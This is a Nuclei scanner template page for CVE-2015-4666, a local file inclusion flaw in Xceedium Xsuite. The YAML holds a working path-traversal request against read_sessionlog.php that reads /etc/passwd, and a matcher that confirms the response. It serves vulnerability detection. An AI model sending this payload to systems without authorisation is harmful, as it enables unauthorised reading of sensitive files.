Skip to content
Nuclei Templates

Xceedium Xsuite <=2.4.4.5 - Local File Inclusion

ID: CVE-2015-4666

Severity: medium

Author: 0x_Akoko

Tags: cve2015,cve,xceedium,xsuite,lfi,packetstorm,xss

Description

Section titled “Description”

Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2015-4666


info:
  name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, disclosure of sensitive information, and potential remote code execution.
  remediation: |
    Upgrade Xceedium Xsuite to a version higher than 2.4.4.5 or apply the necessary patches provided by the vendor.
  reference:
    - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
    - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4666
    - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
    - https://www.exploit-db.com/exploits/37708/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-4666
    cwe-id: CWE-22
    epss-score: 0.02372
    epss-percentile: 0.89823
    cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: xceedium
    product: xsuite
  tags: cve2015,cve,xceedium,xsuite,lfi,packetstorm,xss


http:
  - method: GET
    path:
      - "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 490a0046304402203df3bedd46b755765a99c60fc1ca980a79adcc1465ae5326aa47bc47a648777c02206cdabbdd82e93070898f2d59331f2999d490a927568ed8ba2d7abb12739c9b7e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-4666.yaml"

View on Github